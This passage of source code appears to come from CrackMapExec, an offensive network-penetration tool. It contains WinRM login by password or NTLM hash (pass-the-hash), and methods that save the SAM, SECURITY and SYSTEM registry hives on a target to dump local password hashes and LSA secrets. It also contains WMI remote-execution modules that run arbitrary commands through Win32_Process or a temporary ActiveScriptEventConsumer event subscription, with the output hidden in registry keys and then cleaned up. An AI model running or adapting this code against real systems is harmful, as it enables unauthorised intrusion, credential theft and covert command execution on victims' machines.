self.logger.info(f"Connection Timeout to WinRM service (max retries exceeded)")
else:
self.logger.info(f"Other ConnectionError to WinRM service: {e}")
return False
def plaintext_login(self, domain, username, password):
try:
from urllib3.connectionpool import log
# log.addFilter(SuppressFilter())
if not self.args.laps:
self.password = password
self.username = username
self.domain = domain
if self.args.ssl and self.args.ignore_ssl_cert:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{domain}\\{self.username}",
password=self.password,
ssl=True,
cert_validation=False,
)
elif self.args.ssl:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{domain}\\{self.username}",
password=self.password,
ssl=True,
)
else:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{domain}\\{self.username}",
password=self.password,
ssl=False,
)
# TO DO: right now we're just running the hostname command to make the winrm library auth to the server
# we could just authenticate without running a command :) (probably)
self.conn.execute_ps("hostname")
self.admin_privs = True
self.logger.success(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}")
self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}")
self.db.add_credential("plaintext", domain, self.username, self.password)
# TODO: when we can easily get the host_id via RETURNING statements, readd this in
# host_id = self.db.get_hosts(self.host)[0].id
# self.db.add_loggedin_relation(user_id, host_id)
if self.admin_privs:
self.logger.debug(f"Inside admin privs")
self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except Exception as e:
if "with ntlm" in str(e):
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}")
else:
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'")
return False
def hash_login(self, domain, username, ntlm_hash):
try:
# from urllib3.connectionpool import log
# log.addFilter(SuppressFilter())
lmhash = "00000000000000000000000000000000:"
nthash = ""
if not self.args.laps:
self.username = username
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
else:
nthash = ntlm_hash
ntlm_hash = lmhash + nthash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
else:
nthash = self.hash
self.domain = domain
if self.args.ssl and self.args.ignore_ssl_cert:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{self.domain}\\{self.username}",
password=lmhash + nthash,
ssl=True,
cert_validation=False,
)
elif self.args.ssl:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{self.domain}\\{self.username}",
password=lmhash + nthash,
ssl=True,
)
else:
self.conn = Client(
self.host,
auth="ntlm",
username=f"{self.domain}\\{self.username}",
password=lmhash + nthash,
ssl=False,
)
# TO DO: right now we're just running the hostname command to make the winrm library auth to the server
# we could just authenticate without running a command :) (probably)
self.conn.execute_ps("hostname")
self.admin_privs = True
self.logger.success(f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}")
self.db.add_credential("hash", domain, self.username, nthash)
if self.admin_privs:
self.db.add_admin_user("hash", domain, self.username, nthash, self.host)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except Exception as e:
if "with ntlm" in str(e):
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)}")
else:
self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)} '{e}'")
return False
def execute(self, payload=None, get_output=False):
try:
r = self.conn.execute_cmd(self.args.execute, encoding=self.args.codec)
except:
self.logger.info("Cannot execute command, probably because user is not local admin, but" " powershell command should be ok!")
r = self.conn.execute_ps(self.args.execute)
self.logger.success("Executed command")
buf = StringIO(r[0]).readlines()
for line in buf:
self.logger.highlight(line.strip())
def ps_execute(self, payload=None, get_output=False):
r = self.conn.execute_ps(self.args.ps_execute)
self.logger.success("Executed command")
buf = StringIO(r[0]).readlines()
for line in buf:
self.logger.highlight(line.strip())
def sam(self):
self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM")
self.conn.fetch("C:\\windows\\temp\\SAM", self.output_filename + ".sam")
self.conn.fetch("C:\\windows\\temp\\SYSTEM", self.output_filename + ".system")
self.conn.execute_cmd("del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM")
local_operations = LocalOperations(f"{self.output_filename}.system")
boot_key = local_operations.getBootKey()
SAM = SAMHashes(
f"{self.output_filename}.sam",
boot_key,
isRemote=None,
perSecretCallback=lambda secret: self.logger.highlight(secret),
)
SAM.dump()
SAM.export(f"{self.output_filename}.sam")
def lsa(self):
self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM")
self.conn.fetch("C:\\windows\\temp\\SECURITY", f"{self.output_filename}.security")
self.conn.fetch("C:\\windows\\temp\\SYSTEM", f"{self.output_filename}.system")
self.conn.execute_cmd("del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY")
local_operations = LocalOperations(f"{self.output_filename}.system")
boot_key = local_operations.getBootKey()
LSA = LSASecrets(
f"{self.output_filename}.security",
boot_key,
None,
isRemote=None,
perSecretCallback=lambda secret_type, secret: self.logger.highlight(secret),
)
LSA.dumpCachedHashes()
LSA.dumpSecrets()
================================================
FILE: cme/protocols/wmi/__init__.py
================================================
================================================
FILE: cme/protocols/wmi/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pathlib import Path
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy import MetaData, Table
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from cme.logger import cme_logger
class database:
def __init__(self, db_engine):
self.CredentialsTable = None
self.HostsTable = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "credentials" (
"id" integer PRIMARY KEY,
"username" text,
"password" text
)"""
)
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"port" integer
)"""
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the CME {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
================================================
FILE: cme/protocols/wmi/db_navigator.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from cme.cmedb import DatabaseNavigator, print_help
class navigator(DatabaseNavigator):
def do_clear_database(self, line):
if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
self.db.clear_database()
def help_clear_database(self):
help_string = """
clear_database
THIS COMPLETELY DESTROYS ALL DATA IN THE CURRENTLY CONNECTED DATABASE
YOU CANNOT UNDO THIS COMMAND
"""
print_help(help_string)
================================================
FILE: cme/protocols/wmi/proto_args.py
================================================
from argparse import _StoreTrueAction
def proto_args(parser, std_parser, module_parser):
wmi_parser = parser.add_parser('wmi', help="own stuff using WMI", parents=[std_parser, module_parser], conflict_handler='resolve')
wmi_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
wmi_parser.add_argument("--port", type=int, choices={135}, default=135, help="WMI port (default: 135)")
wmi_parser.add_argument("--rpc-timeout", help="RPC/DCOM(WMI) connection timeout, default is %(default)s secondes", type=int, default=2)
# For domain options
dgroup = wmi_parser.add_mutually_exclusive_group()
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, type=str, help="Domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='Authenticate locally to each target')
egroup = wmi_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--wmi", metavar='QUERY', dest='wmi',type=str, help='Issues the specified WMI query')
egroup.add_argument("--wmi-namespace", metavar='NAMESPACE', type=str, default='root\\cimv2', help='WMI Namespace (default: root\\cimv2)')
cgroup = wmi_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output")
cgroup.add_argument("-x", metavar='COMMAND', dest='execute', type=str, help='Creates a new cmd process and executes the specified command with output')
cgroup.add_argument("--exec-method", choices={"wmiexec", "wmiexec-event"}, default="wmiexec",
help="method to execute the command. (default: wmiexec). "
"[wmiexec (win32_process + StdRegProv)]: get command results over registry instead of using smb connection. "
"[wmiexec-event (T1546.003)]: this method is not very stable, highly recommend use this method in single host, "
"using on multiple hosts may crash (just try again if it crashed).")
cgroup.add_argument("--interval-time", default=5 ,metavar='INTERVAL_TIME', dest='interval_time', type=int, help='Set interval time(seconds) when executing command, unrecommend set it lower than 5')
cgroup.add_argument("--codec", default="utf-8",
help="Set encoding used (codec) from the target's output (default "
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
"map the result with "
"https://docs.python.org/3/library/codecs.html#standard-encodings and then execute "
"again with --codec and the corresponding codec")
return parser
def get_conditional_action(baseAction):
class ConditionalAction(baseAction):
def __init__(self, option_strings, dest, **kwargs):
x = kwargs.pop('make_required', [])
super(ConditionalAction, self).__init__(option_strings, dest, **kwargs)
self.make_required = x
def __call__(self, parser, namespace, values, option_string=None):
for x in self.make_required:
x.required = True
super(ConditionalAction, self).__call__(parser, namespace, values, option_string)
return ConditionalAction
================================================
FILE: cme/protocols/wmi/wmiexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Author: xiaolichan
# Link: https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-regOut.py
# Note: windows version under NT6 not working with this command execution way
# https://github.com/XiaoliChan/wmiexec-RegOut/blob/main/wmiexec-reg-sch-UnderNT6-wip.py -- WIP
#
# Description:
# For more details, please check out my repository.
# https://github.com/XiaoliChan/wmiexec-RegOut
#
# Workflow:
# Stage 1:
# cmd.exe /Q /c {command} > C:\windows\temp\{random}.txt (aka command results)
#
# powershell convert the command results into base64, and save it into C:\windows\temp\{random2}.txt (now the command results was base64 encoded)
#
# Create registry path: HKLM:\Software\Classes\hello, then add C:\windows\temp\{random2}.txt into HKLM:\Software\Classes\hello\{NewKey}
#
# Remove anythings which in C:\windows\temp\
#
# Stage 2:
# WQL query the HKLM:\Software\Classes\hello\{NewKey} and get results, after the results(base64 strings) retrieved, removed
import time
import uuid
import base64
from cme.helpers.misc import gen_random_string
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
class WMIEXEC:
def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, interval_time, codec):
self.__host = host
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__aesKey = aesKey
self.logger = logger
self.__interval_time = interval_time
self.__registry_Path = ""
self.__outputBuffer = ""
self.__retOutput = True
self.__shell = 'cmd.exe /Q /c '
#self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc '
#self.__pwsh = 'powershell.exe -Enc '
self.__pwd = str('C:\\')
self.__codec = codec
self.__dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True, doKerberos=self.__doKerberos ,kdcHost=self.__kdcHost, aesKey=self.__aesKey)
iInterface = self.__dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login, IID_IWbemLevel1Login)
iWbemLevel1Login = IWbemLevel1Login(iInterface)
self.__iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
self.__win32Process, _ = self.__iWbemServices.GetObject('Win32_Process')
def execute(self, command, output=False):
self.__retOutput = output
if self.__retOutput:
self.execute_WithOutput(command)
else:
command = self.__shell + command
self.execute_remote(command)
self.__dcom.disconnect()
return self.__outputBuffer
def execute_remote(self, command):
self.logger.info(f"Executing command: {command}")
try:
self.__win32Process.Create(command, self.__pwd, None)
except Exception as e:
self.logger.error((str(e)))
def execute_WithOutput(self, command):
result_output = f"C:\\windows\\temp\\{str(uuid.uuid4())}.txt"
result_output_b64 = f"C:\\windows\\temp\\{str(uuid.uuid4())}.txt"
keyName = str(uuid.uuid4())
self.__registry_Path = f"Software\\Classes\\{gen_random_string(6)}"
command = fr'''{self.__shell} {command} 1> {result_output} 2>&1 && certutil -encodehex -f {result_output} {result_output_b64} 0x40000001 && for /F "usebackq" %G in ("{result_output_b64}") do reg add HKLM\{self.__registry_Path} /v {keyName} /t REG_SZ /d "%G" /f && del /q /f /s {result_output} {result_output_b64}'''
self.execute_remote(command)
self.logger.info("Waiting {}s for command completely executed.".format(self.__interval_time))
time.sleep(self.__interval_time)
self.queryRegistry(keyName)
def queryRegistry(self, keyName):
try:
self.logger.debug(f"Querying registry key: HKLM\\{self.__registry_Path}")
descriptor, _ = self.__iWbemServices.GetObject('StdRegProv')
descriptor = descriptor.SpawnInstance()
retVal = descriptor.GetStringValue(2147483650, self.__registry_Path, keyName)
self.__outputBuffer = base64.b64decode(retVal.sValue).decode(self.__codec, errors='replace').rstrip('\r\n')
except Exception as e:
self.logger.fail(f'WMIEXEC: Get output file error, maybe command not executed successfully or got detected by AV software, please increase the interval time of command execution with "--interval-time" option. If it\'s still failing maybe something is blocking the schedule job in vbscript, try another exec method')
try:
self.logger.debug(f"Removing temporary registry path: HKLM\\{self.__registry_Path}")
retVal = descriptor.DeleteKey(2147483650, self.__registry_Path)
except Exception as e:
self.logger.debug(f"Target: {self.__host} removing temporary registry path error: {str(e)}")
================================================
FILE: cme/protocols/wmi/wmiexec_event.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Author: xiaolichan
# Link: https://github.com/XiaoliChan/wmiexec-Pro
# Note: windows version under NT6 not working with this command execution way, it need Win32_ScheduledJob.
# https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/modules/exec_command.py
#
# Description:
# For more details, please check out my repository.
# https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/modules/exec_command.py
#
# Workflow:
# Stage 1:
# Generate vbs with command.
#
# Stage 2:
# Execute vbs via wmi event, the vbs will write back the command result into new instance in ActiveScriptEventConsumer.Name="{command_ResultInstance}"
#
# Stage 3:
# Get result from reading wmi object ActiveScriptEventConsumer.Name="{command_ResultInstance}"
#
# Stage 4:
# Remove everythings in wmi object
import time
import uuid
import base64
import sys
from io import StringIO
from cme.helpers.powershell import get_ps_script
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login, WBEMSTATUS
class WMIEXEC_EVENT:
def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, interval_time, codec):
self.__host = host
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = lmhash
self.__nthash = nthash
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__aesKey = aesKey
self.__outputBuffer = ""
self.__retOutput = True
self.logger = logger
self.__interval_time = interval_time
self.__codec = codec
self.__instanceID = f"windows-object-{str(uuid.uuid4())}"
self.__instanceID_StoreResult = f"windows-object-{str(uuid.uuid4())}"
self.__dcom = DCOMConnection(self.__host, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, oxidResolver=True, doKerberos=self.__doKerberos ,kdcHost=self.__kdcHost, aesKey=self.__aesKey)
iInterface = self.__dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login, IID_IWbemLevel1Login)
iWbemLevel1Login = IWbemLevel1Login(iInterface)
self.__iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/subscription', NULL, NULL)
iWbemLevel1Login.RemRelease()
def execute(self, command, output=False):
if "'" in command: command = command.replace("'",r'"')
self.__retOutput = output
self.execute_handler(command)
self.__dcom.disconnect()
return self.__outputBuffer
def execute_remote(self, command):
self.logger.info(f"Executing command: {command}")
try:
self.execute_vbs(self.process_vbs(command))
except Exception as e:
self.logger.error((str(e)))
def execute_handler(self, command):
# Generate vbsript and execute it
self.logger.debug(f"{self.__host}: Execute command via wmi event, job instance id: {self.__instanceID}, command result instance id: {self.__instanceID_StoreResult}")
self.execute_remote(command)
# Get command results
self.logger.info("Waiting {}s for command completely executed.".format(self.__interval_time))
time.sleep(self.__interval_time)
if self.__retOutput:
self.get_CommandResult()
# Clean up
self.remove_Instance()
def process_vbs(self, command):
schedule_taskname = str(uuid.uuid4())
# Link: https://github.com/XiaoliChan/wmiexec-Pro/blob/main/lib/vbscripts/Exec-Command-WithOutput.vbs
# The reason why need to encode command to base64:
# because if some special charters in command like chinese,
# when wmi doing put instance, it will throwing a exception about data type error (lantin-1),
# but we can base64 encode it and submit the data without spcial charters to avoid it.
if self.__retOutput:
output_file = f"{str(uuid.uuid4())}.txt"
with open(get_ps_script("wmiexec_event_vbscripts/Exec_Command_WithOutput.vbs"), "r") as vbs_file:
vbs = vbs_file.read()
vbs = vbs.replace("REPLACE_ME_BASE64_COMMAND", base64.b64encode(command.encode()).decode())
vbs = vbs.replace("REPLACE_ME_OUTPUT_FILE", output_file)
vbs = vbs.replace("REPLACE_ME_INSTANCEID", self.__instanceID_StoreResult)
vbs = vbs.replace("REPLACE_ME_TEMP_TASKNAME", schedule_taskname)
else:
# From wmihacker
# Link: https://github.com/rootclay/WMIHACKER/blob/master/WMIHACKER_0.6.vbs
with open(get_ps_script("wmiexec_event_vbscripts/Exec_Command_Silent.vbs"), "r") as vbs_file:
vbs = vbs_file.read()
vbs = vbs.replace("REPLACE_ME_BASE64_COMMAND", base64.b64encode(command.encode()).decode())
vbs = vbs.replace("REPLACE_ME_TEMP_TASKNAME", schedule_taskname)
return vbs
def checkError(self, banner, call_status):
if call_status != 0:
try:
error_name = WBEMSTATUS.enumItems(call_status).name
except ValueError:
error_name = 'Unknown'
self.logger.debug("{} - ERROR: {} (0x{:08x})".format(banner, error_name, call_status))
else:
self.logger.debug(f"{banner} - OK")
def execute_vbs(self, vbs_content):
# Copy from wmipersist.py
# Install ActiveScriptEventConsumer
activeScript, _ = self.__iWbemServices.GetObject('ActiveScriptEventConsumer')
activeScript = activeScript.SpawnInstance()
activeScript.Name = self.__instanceID
activeScript.ScriptingEngine = 'VBScript'
activeScript.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]
activeScript.ScriptText = vbs_content
# Don't output impacket default verbose
current=sys.stdout
sys.stdout = StringIO()
resp = self.__iWbemServices.PutInstance(activeScript.marshalMe())
sys.stdout = current
self.checkError(f'Adding ActiveScriptEventConsumer.Name="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
# Timer means the amount of milliseconds after the script will be triggered, hard coding to 1 second it in this case.
wmiTimer, _ = self.__iWbemServices.GetObject('__IntervalTimerInstruction')
wmiTimer = wmiTimer.SpawnInstance()
wmiTimer.TimerId = self.__instanceID
wmiTimer.IntervalBetweenEvents = 1000
#wmiTimer.SkipIfPassed = False
# Don't output verbose
current=sys.stdout
sys.stdout = StringIO()
resp = self.__iWbemServices.PutInstance(wmiTimer.marshalMe())
sys.stdout = current
self.checkError(f'Adding IntervalTimerInstruction.TimerId="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
# EventFilter
eventFilter,_ = self.__iWbemServices.GetObject('__EventFilter')
eventFilter = eventFilter.SpawnInstance()
eventFilter.Name = self.__instanceID
eventFilter.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]
eventFilter.Query = f'select * from __TimerEvent where TimerID = "{self.__instanceID}" '
eventFilter.QueryLanguage = 'WQL'
eventFilter.EventNamespace = r'root\subscription'
# Don't output verbose
current=sys.stdout
sys.stdout = StringIO()
resp = self.__iWbemServices.PutInstance(eventFilter.marshalMe())
sys.stdout = current
self.checkError(f'Adding EventFilter.Name={self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
# Binding EventFilter & EventConsumer
filterBinding, _ = self.__iWbemServices.GetObject('__FilterToConsumerBinding')
filterBinding = filterBinding.SpawnInstance()
filterBinding.Filter = f'__EventFilter.Name="{self.__instanceID}"'
filterBinding.Consumer = f'ActiveScriptEventConsumer.Name="{self.__instanceID}"'
filterBinding.CreatorSID = [1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0]
# Don't output verbose
current=sys.stdout
sys.stdout = StringIO()
resp = self.__iWbemServices.PutInstance(filterBinding.marshalMe())
sys.stdout = current
self.checkError(fr'Adding FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"", Filter="__EventFilter.Name=\"{self.__instanceID}\""', resp.GetCallStatus(0) & 0xffffffff)
def get_CommandResult(self):
try:
command_ResultObject, _ = self.__iWbemServices.GetObject(f'ActiveScriptEventConsumer.Name="{self.__instanceID_StoreResult}"')
record = dict(command_ResultObject.getProperties())
self.__outputBuffer = base64.b64decode(record['ScriptText']['value']).decode(self.__codec, errors='replace')
except Exception as e:
self.logger.fail(f'WMIEXEC-EVENT: Get output file error, maybe command not executed successfully or got detected by AV software, please increase the interval time of command execution with "--interval-time" option. If it\'s still failing maybe something is blocking the schedule job in vbscript, try another exec method')
def remove_Instance(self):
if self.__retOutput:
resp = self.__iWbemServices.DeleteInstance(f'ActiveScriptEventConsumer.Name="{self.__instanceID_StoreResult}"')
self.checkError(f'Removing ActiveScriptEventConsumer.Name="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
resp = self.__iWbemServices.DeleteInstance(f'ActiveScriptEventConsumer.Name="{self.__instanceID}"')
self.checkError(f'Removing ActiveScriptEventConsumer.Name="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
resp = self.__iWbemServices.DeleteInstance(f'__IntervalTimerInstruction.TimerId="{self.__instanceID}"')
self.checkError(f'Removing IntervalTimerInstruction.TimerId="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
resp = self.__iWbemServices.DeleteInstance(f'__EventFilter.Name="{self.__instanceID}"')
self.checkError(f'Removing EventFilter.Name="{self.__instanceID}"', resp.GetCallStatus(0) & 0xffffffff)
resp = self.__iWbemServices.DeleteInstance(fr'__FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"",Filter="__EventFilter.Name=\"{self.__instanceID}\""')
self.checkError(fr'Removing FilterToConsumerBinding.Consumer="ActiveScriptEventConsumer.Name=\"{self.__instanceID}\"", Filter="__EventFilter.Name=\"{self.__instanceID}\""', resp.GetCallStatus(0) & 0xffffffff)
================================================
FILE: cme/protocols/wmi.py
================================================
import os, struct, logging
from io import StringIO
from six import indexbytes
from datetime import datetime
from cme.config import process_secret
from cme.connection import *
from cme.logger import CMEAdapter
from cme.protocols.wmi import wmiexec, wmiexec_event
from impacket import ntlm
from impacket.uuid import uuidtup_to_bin
from impacket.krb5.ccache import CCache
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, MSRPC_BIND, MSRPCBind, CtxItem, MSRPCHeader, SEC_TRAILER, MSRPCBindAck
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
MSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'))
class wmi(connection):
def __init__(self, args, db, host):
self.domain = None
self.hash = ''
self.lmhash = ''
self.nthash = ''
self.fqdn = ''
self.remoteName = ''
self.server_os = None
self.doKerberos = False
self.stringBinding = None
# From: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/18d8fbe8-a967-4f1c-ae50-99ca8e491d2d
self.rpc_error_status = {
"0000052F" : "STATUS_ACCOUNT_RESTRICTION",
"00000533" : "STATUS_ACCOUNT_DISABLED",
"00000775" : "STATUS_ACCOUNT_LOCKED_OUT",
"00000701" : "STATUS_ACCOUNT_EXPIRED",
"00000532" : "STATUS_PASSWORD_EXPIRED",
"00000530" : "STATUS_INVALID_LOGON_HOURS",
"00000531" : "STATUS_INVALID_WORKSTATION",
"00000569" : "STATUS_LOGON_TYPE_NOT_GRANTED",
"00000773" : "STATUS_PASSWORD_MUST_CHANGE",
"00000005" : "STATUS_ACCESS_DENIED",
"0000052E" : "STATUS_LOGON_FAILURE",
"0000052B" : "STATUS_WRONG_PASSWORD",
"00000721" : "RPC_S_SEC_PKG_ERROR"
}
connection.__init__(self, args, db, host)
def proto_logger(self):
self.logger = CMEAdapter(extra={'protocol': 'WMI',
'host': self.host,
'port': self.args.port,
'hostname': self.hostname})
def create_conn_obj(self):
if self.remoteName == '':
self.remoteName = self.host
try:
rpctansport = transport.DCERPCTransportFactory(r'ncacn_ip_tcp:{0}[{1}]'.format(self.remoteName, str(self.args.port)))
rpctansport.set_credentials(username="", password="", domain="", lmhash="", nthash="", aesKey="")
rpctansport.setRemoteHost(self.host)
rpctansport.set_connect_timeout(self.args.rpc_timeout)
dce = rpctansport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.connect()
dce.bind(MSRPC_UUID_PORTMAP)
dce.disconnect()
except Exception as e:
self.logger.debug(str(e))
return False
else:
self.conn = rpctansport
return True
def enum_host_info(self):
# All code pick from DumpNTLNInfo.py
# https://github.com/fortra/impacket/blob/master/examples/DumpNTLMInfo.py
ntlmChallenge = None
bind = MSRPCBind()
item = CtxItem()
item['AbstractSyntax'] = epm.MSRPC_UUID_PORTMAP
item['TransferSyntax'] = uuidtup_to_bin(('8a885d04-1ceb-11c9-9fe8-08002b104860', '2.0'))
item['ContextID'] = 0
item['TransItems'] = 1
bind.addCtxItem(item)
packet = MSRPCHeader()
packet['type'] = MSRPC_BIND
packet['pduData'] = bind.getData()
packet['call_id'] = 1
auth = ntlm.getNTLMSSPType1('', '', signingRequired=True, use_ntlmv2=True)
sec_trailer = SEC_TRAILER()
sec_trailer['auth_type'] = RPC_C_AUTHN_WINNT
sec_trailer['auth_level'] = RPC_C_AUTHN_LEVEL_PKT_INTEGRITY
sec_trailer['auth_ctx_id'] = 0 + 79231
pad = (4 - (len(packet.get_packet()) % 4)) % 4
if pad != 0:
packet['pduData'] += b'\xFF'*pad
sec_trailer['auth_pad_len']=pad
packet['sec_trailer'] = sec_trailer
packet['auth_data'] = auth
try:
self.conn.connect()
self.conn.send(packet.get_packet())
buffer = self.conn.recv()
except:
buffer = 0
if buffer != 0:
response = MSRPCHeader(buffer)
bindResp = MSRPCBindAck(response.getData())
ntlmChallenge = ntlm.NTLMAuthChallenge(bindResp['auth_data'])
if ntlmChallenge['TargetInfoFields_len'] > 0:
av_pairs = ntlm.AV_PAIRS(ntlmChallenge['TargetInfoFields'][:ntlmChallenge['TargetInfoFields_len']])
if av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1] is not None:
try:
self.hostname = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
self.hostname = self.host
if av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1] is not None:
try:
self.domain = av_pairs[ntlm.NTLMSSP_AV_DNS_DOMAINNAME][1].decode('utf-16le')
except:
self.domain = self.args.domain
if av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1] is not None:
try:
self.fqdn = av_pairs[ntlm.NTLMSSP_AV_DNS_HOSTNAME][1].decode('utf-16le')
except:
pass
if 'Version' in ntlmChallenge.fields:
version = ntlmChallenge['Version']
if len(version) >= 4:
self.server_os = "Windows NT %d.%d Build %d" % (indexbytes(version,0), indexbytes(version,1), struct.unpack(' 0:
self.logger.fail(str(e))
else:
if not flag or not self.stringBinding:
dcom.disconnect()
error_msg = f'Check admin error: dcom initialization failed with stringbinding: "{self.stringBinding}", please try "--rpc-timeout" option. (probably is admin)'
if not self.stringBinding:
error_msg = "Check admin error: dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
